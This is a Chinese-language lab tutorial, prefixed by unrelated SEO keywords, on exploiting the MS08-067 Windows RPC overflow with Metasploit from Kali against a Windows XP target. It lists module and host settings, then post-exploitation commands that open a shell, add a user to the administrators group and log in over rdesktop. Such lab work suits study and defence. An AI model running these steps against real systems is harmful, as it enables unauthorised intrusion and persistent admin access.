怎么在自己的电脑做网站,吉林省建设项目招标网,衡水百度seo,营口网站建设价格1. 漏洞介绍
漏洞描述 Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞#xff0c;远程攻击者可以通过发送恶意的RPC请求触发这个溢出#xff0c;导致完全入侵用户系统#xff0c;以SYSTEM权限执行任意指令。…1. 漏洞介绍
漏洞描述 Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞远程攻击者可以通过发送恶意的RPC请求触发这个溢出导致完全入侵用户系统以SYSTEM权限执行任意指令。 对于Windows 2000、XP和Server 2003无需认证便可以利用该漏洞对于Windows Vista和Server 2008可能需要认证。 补充RPC请求Windows RPCRemote Procedure Call远程过程调用是一种用于网络中进程间通信的技术它允许一个进程调用另一个进程中的方法就像调用本地函数一样。RPC在Windows平台上被广泛使用用于分布式系统和网络服务之间高效的数据交换和服务调用。在RPC中客户端发送一个包含参数的请求消息到服务器这个消息封装了调用的方法、参数以及结果的预期类型。服务器接收到请求后执行相应的函数并返回结果给客户端。整个过程通常是透明的因为RPC提供了底层的协议和数据序列化使得开发者可以专注于业务逻辑而不必关心网络通信的细节。 官方描述 连接MS08-067漏洞描述
2. 环境说明
攻击机kali IP192.168.102.131 靶机win XP IP192.168.102.135
3. 信息收集
ping 查看靶机是否存活nmap 查看靶机信息
4. 渗透攻击
4.1. 启动msf
命令msfconsole
4.2. 查找漏洞
命令search ms08-067
4.3. 使用攻击模块设置攻击载荷设置测试机IP设置靶机IP
使用攻击模块命令use 攻击模块设置测试机IP命令如下 set rhost 靶机IPset lhost 测试机IP
4.4. 开始攻击
命令run 可以发现成功建立
5. 顺利进入主机
5.1 查看权限
Win命令getuid Linux命令whoami
5.2 进入shell
命令shell 此时就进入当前权限下的shell
5.3 添加用户帐号
命令net user 用户 密码 /add
5.4 把刚刚创建好的用户添加到管理员组
命令net localgroup administrators 用户 /add
5.5 远程登录到XP系统
命令为rdesktop 192.168.102.135 前提需要让靶机支持被远程连接做如下配置 rdesktop 192.168.102.135 远程连接
5.6 登录到XP系统查看攻击是否生效
打开CMD查看刚刚创建的用户是否添加到管理员组